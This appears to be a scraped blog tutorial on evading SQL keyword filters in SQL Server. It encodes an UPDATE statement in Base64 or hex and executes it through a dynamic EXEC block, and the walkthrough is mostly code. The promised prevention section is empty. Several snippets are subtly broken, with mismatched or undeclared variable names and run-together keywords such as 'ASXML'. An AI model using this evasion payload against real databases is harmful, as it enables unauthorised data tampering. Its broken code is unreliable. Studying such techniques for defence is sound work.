SQL Injection With Base64 And Its Prevention Mechanism

Datetime:2016-08-23 00:14:19          Topic: SQL  SQL Injection           Share

In my previous article,

I showed you how a hacker can inject SQL injection using Hex code and its prevention mechanism. In this article, I am going to show you, how the hacker can inject SQL injection using Base64 format and its prevention mechanism.

The SQL code block, given below, is to convert the SQL query to Base64 format.

SQL code block

SELECT  
CAST(N''ASXML).value(  
'xs:base64Binary(xs:hexBinary(sql:column("bin")))'  
,'VARCHAR(MAX)'  
) Base64Encoding  
FROM (  
SELECTCAST('update PO_TRANSACTION_DETAILS set DESCRIPTION= ''santosh_base64'' where PO_NUMBER = 1 --/'ASVARBINARY(MAX))AS bin  
)AS bin_sql_server_temp;  

After executing the SQL code block, given above, the output will be highlighted below:

Output

SQL code block, given below, is to convert Base64 format to the actual SQL query.

SQL code block

DECLARE @S VARCHAR(MAX) SET @S =   
(SELECT CAST(CAST(0x75706461746520504F5F5452414E53414354494F4E5F44455441494C5320736574204445534352495054494F4E3D202753616E746F73682720776865726520504F5F4E554D424552203D2031202D2D AS varbinary(MAX))  
AS VARCHAR(MAX)))  
SELECT @S  

After executing SQL code block, given above, the output will be highlighted below:

Output

SQL code block is required to convert SQL query to the binary, from the binary to Base64 and from Base64 to the actual query, shown below:

declare @sourceCode varbinary(max), @encodedFormat varchar(max), @decodedFormt varbinary(max)  
set @sourceCodes =convert(varbinary(max),'update PO_TRANSACTION_DETAILS set DESCRIPTION= ''santosh111'' where PO_NUMBER = 1 --/')  
set @encodedFormat =cast(''asxml).value('xs:base64Binary(sql:variable("@source"))','varchar(max)')  
set @decodedFormat =cast(''asxml).value('xs:base64Binary(sql:variable("@encoded"))','varbinary(max)')  
select  
convert(varchar(max), @sourceCode)as sourceCode_varchar,  
@sourceCode as sourceCode_binary,  
@encodedFormat as encodedFormat,  
@decodedFormat as decodedFormat_binary,  
convert(varchar(max), @decodedFormat) as decodedFormat_varchar  

Output

Let's say your Application is handling SQL reserved keywords like Update, Delete and Drop etc. but the Application is not handling for Base64 format. Let's see how can the hacker inject his malicious code through the application?

Actual SQL query

UPDATE PO_TRANSACTION_DETAILS SET DESCRIPTION= ''santosh_Base64'' WHERE PO_NUMBER = 1 --/  

SQL query converted to Base64 format

VVBEQVRFIFBPX1RSQU5TQUNUSU9OX0RFVEFJTFMgU0VUIERFU0NSSVBUSU9OPSAnc2FudG9zaF9CYXNlNjQnIFdIRVJFIFBPX05VTUJFUiA9IDEgLS0v

SQL injection using dynamic SQL code block with Base64 code format

Declare @S VARCHAR(MAX)  
SET @S =(SELECTCAST(CAST(N''ASXML).value('xs:base64Binary("dXBkYXRlIFBPX1RSQU5TQUNUSU9OX0RFVEFJTFMgc2V0IERFU0NSSVBUSU9OPSAnc2FudG9zaDExMScgd2hlcmUgUE9fTlVNQkVSID0gMSAtLS8=")','VARBINARY(MAX)')ASVARCHAR(MAX)))  
EXEC(@S)  

If you observe the above SQL code block, the hacker can write a dynamic SQL code block with Base64 format which is highlighted in yellow color to inject some malicious code into your database.

After successful execution of SQL code block, given above, the output will be highlighted as below:

Output

Screenshot #1

Screenshot #2

Prevention mechanism

You can prevent such SQL injection, using the same techniques which I discussed in my previous article:  





About List